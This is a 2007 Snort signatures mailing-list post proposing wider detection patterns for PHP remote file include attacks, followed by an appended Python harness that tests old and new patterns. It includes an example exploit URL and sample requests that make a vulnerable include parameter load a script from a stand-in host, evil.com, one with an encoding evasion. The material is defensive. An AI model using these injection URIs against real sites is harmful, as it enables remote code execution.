[Snort-sigs] PHP remote include sigs (part I)

Jamie Riden jamie.riden at ...2420...
Wed May 30 05:56:49 EDT 2007


Hi there,

A lot of the PHP remote file include sigs have matches like
pcre:"/=\s*(https?|ftp)\:\//Ui", and some without the /i modifier,
some without the /U.

It turns out that PHP also ships with the following URL schemes
enabled by default:

php://filter/resource=http://www.example.com and
ftps://ftp.example.com - a brief test seems to confirm that these work
just as well as http for file inclusion.

i.e. an exploit URL would be something like:
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com/script.txt

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions. I have tested this briefly, but a
sanity check would be welcome.

cheers,
 Jamie

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP remote include path";
flow:established,to_server; uricontent:".php"; content:"path=";
pcre:"/path=\s*(https?|php|ftps?)\:\//Ui"; classtype:web-application-attack;
sid:2002; rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHP-Nuke remote file include
attempt"; flow:to_server,established; uricontent:"/index.php"; nocase;
content:"file="; pcre:"/file=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,3889; reference:cve,2002-0206;
classtype:web-application-attack; sid:1399; rev:12;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP b2 cafelog gm-2-b2.php remote
file include attempt"; flow:to_server,established;
uricontent:"/gm-2-b2.php"; content:"b2inc=";
pcre:"/b2inc=\s*(https?|php|ftps?)\:\//Ui"; reference:nessus,11667;
classtype:web-application-attack; sid:2143; rev:4;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP BLNews objects.inc.php4 remote
file include attempt"; flow:to_server,established;
uricontent:"/objects.inc.php4"; content:"Server[path]=";
pcre:"/Server\x5bpath\x5d=(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7677; reference:cve,2003-0394;
reference:nessus,11647; classtype:web-application-attack; sid:2147;
rev:8;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ttCMS header.php remote file
include attempt"; flow:to_server,established;
uricontent:"/admin/templates/header.php"; content:"admin_root=";
pcre:"/admin_root=(https?|php|ftps?)\:\//Ui"; reference:bugtraq,7542;
reference:bugtraq,7543; reference:bugtraq,7625;
reference:nessus,11636; classtype:web-application-attack; sid:2150;
rev:8;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP ttforum remote file include
attempt"; flow:to_server,established; uricontent:"forum/index.php";
content:"template="; pcre:"/template=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7542; reference:bugtraq,7543;
reference:nessus,11615; classtype:web-application-attack; sid:2155;
rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP pmachine remote file include
attempt"; flow:to_server,established; uricontent:"lib.inc.php";
content:"pm_path="; pcre:"/pm_path=(https?|php|ftps?)\:\//Ui";
reference:bugtraq,7919; reference:nessus,11739;
classtype:web-application-attack; sid:2226; rev:6;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP gallery remote file include
attempt"; flow:to_server,established; uricontent:"/setup/";
content:"GALLERY_BASEDIR=";
pcre:"/GALLERY_BASEDIR=\s*(https?|php|ftps?)\:\//Ui"; reference:bugtraq,8814;
reference:nessus,11876; classtype:web-application-attack; sid:2306;
rev:5;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PayPal Storefront remote file
include attempt"; flow:to_server,established; content:"do=ext";
content:"page="; pcre:"/page=\s*(https?|php|ftps?)\:\//Ui";
reference:bugtraq,8791; reference:nessus,11873;
classtype:web-application-attack; sid:2307; rev:7;)

/etc/snort/rules/web-php.rules:alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Opt-X header.php remote file
include attempt"; flow:to_server,established;
uricontent:"/header.php"; nocase; content:"systempath=";
pcre:"/systempath=\s*(https?|php|ftps?)\:\//Ui"; reference:bugtraq,9732;
classtype:web-application-attack; sid:2575; rev:2;)

-- 
Jamie Riden, CISSP / jamesr at ...3216... / jamie at ...3294...
UK Honeynet Project: http://www.ukhoneynet.org/
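Added example, not part of Jamie's post or of the Snort rule set: a small
Python harness that parses a Snort pcre option value, approximates the
normalised URI buffer that the /U modifier selects (percent-decoding only,
which is an assumption, since real http_inspect normalisation does more),
and runs the old and the proposed patterns over constructed request URIs.
The old "file=" pattern is reconstructed from the (https?|ftp) shape quoted
at the top of the post; the new one is the sid:1399 pcre exactly as posted.
All hostnames and sample requests are made up for the demonstration.

```python
import re
from urllib.parse import unquote

# Snort pcre option values as they would appear in web-php.rules.
# OLD_PCRE is the pre-change shape described in the post (reconstructed,
# not copied from a shipped rule); NEW_PCRE is the sid:1399 pcre as posted;
# NEW_PCRE_NO_U drops the /U modifier to show what that modifier buys.
OLD_PCRE = r'"/file=\s*(https?|ftp)\:\//Ui"'
NEW_PCRE = r'"/file=\s*(https?|php|ftps?)\:\//Ui"'
NEW_PCRE_NO_U = r'"/file=\s*(https?|php|ftps?)\:\//i"'

# Snort pcre modifiers with a direct Python re equivalent. 'U' selects the
# normalised URI buffer rather than changing the regex, so it is handled
# separately in match() below.
_FLAG_MAP = {"i": re.IGNORECASE, "s": re.DOTALL, "m": re.MULTILINE, "x": re.VERBOSE}


def compile_snort_pcre(option):
    """Turn a Snort pcre option value ("/pattern/flags") into a compiled re.

    Returns (compiled_regex, uri_buffer) where uri_buffer is True when the
    rule asked for the normalised URI buffer via /U.
    """
    body = option.strip().strip('"')
    if not body.startswith("/"):
        raise ValueError("pcre option must start with '/'")
    end = body.rfind("/")
    if end == 0:
        raise ValueError("unterminated pcre pattern")
    pattern, modifiers = body[1:end], body[end + 1:]
    flags = 0
    for m in modifiers:
        flags |= _FLAG_MAP.get(m, 0)
    return re.compile(pattern, flags), "U" in modifiers


def normalised_uri(raw_uri):
    """Approximation (assumption) of Snort's normalised URI buffer.

    Only percent-decoding is done here; the real preprocessor also collapses
    multiple slashes, resolves ./ and ../ and so on. Percent-decoding is the
    part that matters for the \\s* in these patterns, because a %20 in front
    of the scheme only becomes a space after normalisation.
    """
    return unquote(raw_uri)


def match(option, raw_uri):
    """Does the rule's pcre option alert on this request URI?"""
    regex, uri_buffer = compile_snort_pcre(option)
    target = normalised_uri(raw_uri) if uri_buffer else raw_uri
    return regex.search(target) is not None


# Constructed sample requests against the PHP-Nuke-style file= parameter.
SAMPLES = {
    "benign":     "/index.php?file=modules.php",
    "http":       "/index.php?file=http://www.evil.com/script.txt",
    "upper_http": "/index.php?file=HTTP://www.evil.com/script.txt",
    "ftp":        "/index.php?file=ftp://ftp.evil.com/script.txt",
    "ftps":       "/index.php?file=ftps://ftp.evil.com/script.txt",
    "php_filter": "/index.php?file=php://filter/resource=http://www.evil.com/script.txt",
    "pct_space":  "/index.php?file=%20php://filter/resource=http://www.evil.com/script.txt",
}


def coverage(option):
    """Names of the samples the given pcre option alerts on."""
    return {name for name, uri in SAMPLES.items() if match(option, uri)}


def missed_by_old_caught_by_new():
    """Samples that only the proposed pattern detects."""
    return coverage(NEW_PCRE) - coverage(OLD_PCRE)


if __name__ == "__main__":
    for name, uri in SAMPLES.items():
        print(f"{name:11s} old={match(OLD_PCRE, uri)!s:5} "
              f"new={match(NEW_PCRE, uri)!s:5} {uri}")
    print("gained by new pattern:", sorted(missed_by_old_caught_by_new()))
```

Two things worth noting from running it. First, the parameter-anchored
rules in the post (file=, path=, b2inc= ...) genuinely miss the php://filter
form without the "php" alternative, because the only "=http://" in such a
request sits after "resource=", not after the parameter the rule names; a
bare "/=\s*(https?|ftp)\:\//" would match that inner "resource=http://"
by accident, which is not something to rely on. Second, the /U modifier is
what lets "\s*" see a percent-encoded space in front of the scheme; the
same pattern without /U, matched against the raw payload, does not fire on
the pct_space sample.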